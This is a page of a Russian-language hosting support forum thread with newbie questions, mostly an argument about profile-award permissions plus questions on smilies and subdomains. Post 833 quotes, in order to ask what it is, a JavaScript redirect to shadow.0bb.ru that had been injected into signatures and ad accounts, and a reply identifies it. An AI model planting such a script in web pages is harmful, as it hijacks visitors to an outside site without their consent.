Единый форум поддержки

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Единый форум поддержки » Корзина » Общие вопросы от новичков 10

Общие вопросы от новичков 10

Сообщений 821 страница 840 из 1000

821

BTCY123

оставьте ваши приколы для других форов, здесь вам люди помогают, порой в ущерб своим делам и своим форумам.

Ваш вопрос опять таки непонятен- что вы имеете в виду? Простые пользователи и так не могут сами давать себе награды(если правильно при этом оформить в админке поля-Заполнение-Разрешить пользователю заполнение этого поля? Если не разрешено - это поле участнику могут заполнить администратор или модераторы. тут можно ставить да или нет)

0

822

студентка
опять же отмечу что я на это уже отвечал
Написала

Юльчи написал(а):

BTCY123
В сам скрипт ничего не надо дописывать. Нужно исправить параметры дополнительного поля, отведенного под награды: Заполнение - нет
Читайте внимательно инструкции Награды - новый скрипт

Я ответил

BTCY123 написал(а):

Юльчи
Я читал внимательно. У меня стоит "Нет". И там написано "Разрешить пользователю заполнение этого поля? Если не разрешено - это поле участнику могут заполнить администратор или модераторы."
А мне надо что бы ТОЛЬКО АДмиНИСТРАЦИЯ могла присваивать награды.

студентка написал(а):

оставьте ваши приколы для других форов, здесь вам люди помогают, порой в ущерб своим делам и своим форумам.

Насчёт приколов, я не виноват если тебе мои слова показались смешными, я отвечал вполне серьёзно. И это не приколы.
PS Скажи, что было прикольного в моей фразе? Я все сказал по существу без приколов.

0

823

BTCY123 написал(а):

А мне надо что бы ТОЛЬКО АДмиНИСТРАЦИЯ могла присваивать награды.

То есть у вас так много модеров на форуме и все рвутся присваивать награды?

0

824

студентка
Да етит ...налево, какая разница сколько у меня на форуме модеров? Я сюда написал не для того, что бы рассказать сколько у меня на форуме модеров. Этот разговор мог уместится в 2 поста, любишь флуд разводить? не отвечай, если не можешь помоч по моему вопросы, а то слишком большой "ущерб твоего времени" будет.  :offtop:

Отредактировано BTCY123 (Вт, 23 Июн 2009 11:32:24)

0

825

BTCY123

Знаешь, что. буду рада если тебя забанят.

0

826

студентка
Взаимно.
Только, вот интересно, за что? я оффтоп не разводил и попросту не болтал, а лишь отвечал на твои вопросы и наезды. В отличение от некоторых. Вместо того что бы помочь, ты мне тут наезды выкатила, причем, заметь, начала ты. Кого банить надо, дык это точно не меня. (естественно если судить логически, а не эмоционально).

0

827

BTCY123

Правила читай, за мультипостинг-бан

+1

828

студентка
Провокатор - ты, я задал вполне конкретный вопрос, ещё в самом первом посте, там всё ЧЕТКО УКАЗАНО, просто многие не читают его внимательно. А насчёт мульти-постинг, ну во первых - ты начала это сыр бор, хотя, как я понял ты не можешь помочь ( а раз не можешь помочь, зачем вообще начала разговор? что бы нервы по мотать? Или может превосходство хотело почувствовать? в любом случае, у тебя это не получилось), ну а во вторых - ты сама заслуживаешь, из твоих же слов, - бан, поскольку пишешь не меньше меня по одному вопросу, который занял бы всего 2 поста.

0

829

Пост №812
разобрался... всем спасибо.

0

830

BTCY123, прекращаем гнилой базар, за изменением скриптов обращайтесь к создателям этих скриптов. Это не в этой теме

0

831

Ну хоть что-то по теме.
Хотя,

Good написал(а):

прекращаем гнилой базар

, слишком грубо адресовано человеку который не начинал этот "гнилой базар". Как я говорил надо судить логически, а не эмоционально. И естественно студентка осталось не виновной. Другого я и не предвидел почему - то, хотя надежда была.
Все закругляюсь.

0

832

BTCY123 написал(а):

, слишком грубо адресовано человеку который не начинал этот "гнилой базар". Как я говорил надо судить логически, а не эмоционально. И естественно студентка осталось не виновной. Другого я и не предвидел почему - то, хотя надежда была.

не надо обижаться, просто здесь помоему ещё не кто без помощи не остался если есть возможность помочь. Раз вам не ответили значит сами не знаем. Обратитесь в личку к создателю скрипта, так будет надёжней.

0

833

Подскажите пожалуйста, что означает данный скрипт? Он у меня уже 4 раза мелькал на форуме и начинает немного раздражать, включая меня и пользователей форума, скрипт всегда ставят к аккуанту рекламы, подпись или под аватарам. Обращаться к данному форуму что написанно в адресе того скрипта без толку, ибо скажут "мы тут не при чём", просто крайне интересно что означает данная надпись

<script language="JavaScript"> window.location.href = "http://shadow.0bb.ru" </script>

0

834

А как сделать другие смайлы))) Не те стандартные а свои возможно вставить?

0

835

МЕДВЕД написал(а):

А как сделать другие смайлы))) Не те стандартные а свои возможно вставить?

ищите в теме http://forum.mybb.ru/viewtopic.php?id=16097

+1

836

спс))))0 большое))

0

837

Shana написал(а):

Подскажите пожалуйста, что означает данный скрипт?

переадресацию на этот форум.. :D  кто то у вас там химичит!! из админов..
и проверьте все скрипты форума на этот код.. :rolleyes:  особенно баннеры..

0

838

блин.. дайте ссыль на новый рестор.. ^^  проверил..

0

839

У меня есть вопрос! Можно как нибудь сайт поставить в определенную область! Ну наприме чтобы сайт был допустим pogovorim.omsk.9bb.ru? А то внешка дорогая !

0

840

У меня фору куда-то исчес пишет такого не сушествует
Вот ссылка

0

Вы здесь » Единый форум поддержки » Корзина » Общие вопросы от новичков 10